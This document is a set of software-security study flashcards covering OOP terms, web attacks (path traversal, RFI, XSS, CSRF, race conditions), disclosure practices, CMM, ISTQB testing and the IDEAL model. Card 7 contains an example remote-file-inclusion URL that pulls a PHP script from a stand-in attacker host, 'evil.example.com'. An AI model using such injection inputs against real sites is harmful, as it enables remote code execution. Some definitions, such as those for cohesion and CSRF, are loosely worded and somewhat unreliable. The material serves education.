Domain 8: Software Security Flashcards

1
Q
  • OOP Term

- Used to describe level of an object’s dependence on other objects

A

Coupling

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q
  • OOP Term

- Used to describe the level of an object’s independence of other objects

A

Cohesion

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q
  • OOP Terms

- Object that greatly depends on another object

A

High Coupling and Low Cohesion

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q
  • OOP Terms

- Object that is mostly independent from other objects

A

High Cohesion and Low Coupling

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q
  • Used to locate objects act as search engines
  • Connects programs to programs
  • i.e. COM, DCOM, CORBA
A

Object Request Brokers (ORBs)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

Escaping from the root of the web server (i.e. /var/www) into the regular file system by referencing directories such as “../’’”

A

Directory Path Traversal

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

Altering normal PHP URLs and variable to include and execute remote content
i.e. http://good.example.com?file=http://evil.example.com/bad.php

A

Remote File Inclusion (RFI)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

Attacker attempts to alter a condition after it has been checked by the OS, but before it is used

A

Time of check/Time of use (TOC/TOU) attacks aka Race conditions

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

Leverages third-party execution of scripting languages within the security context of a trusted site

A

Cross-site scripting (XSS)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

Leverages a third-party redirect of static content within the security context of a trusted site

A

Cross-site request forgery (CSRF)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

Describes actions taken by the security researcher after discovering a software vulnerability

A

Disclosure

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

Practice of releasing vulnerability details publicly

A

Full disclosure

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

Practice of privately sharing vulnerability info with a vendor and withholding public release until a patch is available

A

Responsible disclosure

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q
  • Framework intended help software organizations improve the maturity and quality of the software process
  • Categorizes 5 stages organization software processes go through to reach maturity
  • Maturity framework for evaluating and improving the software development process
A

Software Capability Maturity Model (CMM)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

Name the 5 stages of the Software Capability Maturity Model (CMM)

A
  1. Initial
  2. Repeatable
  3. Defined
  4. Managed
  5. Optimizing
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q
  • Software Capability Maturity Model (CMM) stage

- Little to no software processes are defined

A

Initial

17
Q
  • Software Capability Maturity Model (CMM) stage
  • Basic project management processes are established to track cost, schedule, and functionality.
  • Code is reused in similar projects to duplicate results
A

Repeatable

18
Q
  • Software Capability Maturity Model (CMM) stage
  • The software process for both management and engineering activities is documented, standardized, and integrated into standard software process for the organization
A

Defined

19
Q
  • Software Capability Maturity Model (CMM) stage
  • Detailed quantitative measures of the software process and product quality are collected, analyzed, and used to control the process.
A

Managed

20
Q
  • Software Capability Maturity Model (CMM) stage
  • Continual process improvement is enabled by quantitative feedback from the process and from piloting innovative ideas and technologies.
A

Optimizing

21
Q
  • Examines whether software meets various end-state requirements,
  • i.e. from a user or customer, contract, or compliance
A

Acceptance Testing

22
Q
  • International Software Testing Qualifications Board (ISTQB) acceptance testing level
  • Focuses on the validating the fitness-for-use of the system by the business user
A

User Acceptance Test

23
Q
  • International Software Testing Qualifications Board (ISTQB) acceptance testing level
  • Validates whether the system meets the requirements for operation
A

Operational Acceptance test

24
Q
  • International Software Testing Qualifications Board (ISTQB) acceptance testing level
  • Performed against contract’s acceptance criteria for producing custom-developed software
A

Contract Acceptance testing

25
Q
  • International Software Testing Qualifications Board (ISTQB) acceptance testing level
  • Performed against the regulations that must be followed i.e. government, safety, etc.
A

Compliance Acceptance testing

26
Q

Alternate to Software Capability Maturity Model for software development processes

A

IDEAL Model

27
Q

List the 5 stages of the IDEAL Model Stages

A
  1. Initiating
  2. Diagnosing
  3. Establishing
  4. Acting
  5. Learning
28
Q
  • IDEAL Model Stage
  • Business reasons behind the change are outline, support is built for the initiative, and the the appropriate infrastructure is put in place
A

Initiating

29
Q
  • IDEAL Model Stage

- Engineers analyze the current state of the organization and make general recommendations for change

A

Diagnosing

30
Q
  • IDEAL Model Stage
  • Organization takes the general recommendations from the diagnosing phase and develops a specific plan of action that helps achieve those changes
A

Establishing

31
Q
  • IDEAL Model Stage

- Organization develops solutions and then tests, refines, and implements them.

A

Acting

32
Q
  • IDEAL Model Stage
  • Organization must continuously analyze its efforts to determine whether it has achieved the desired goals and, when necessary, propose new actions to put the organization back on course
A

Learning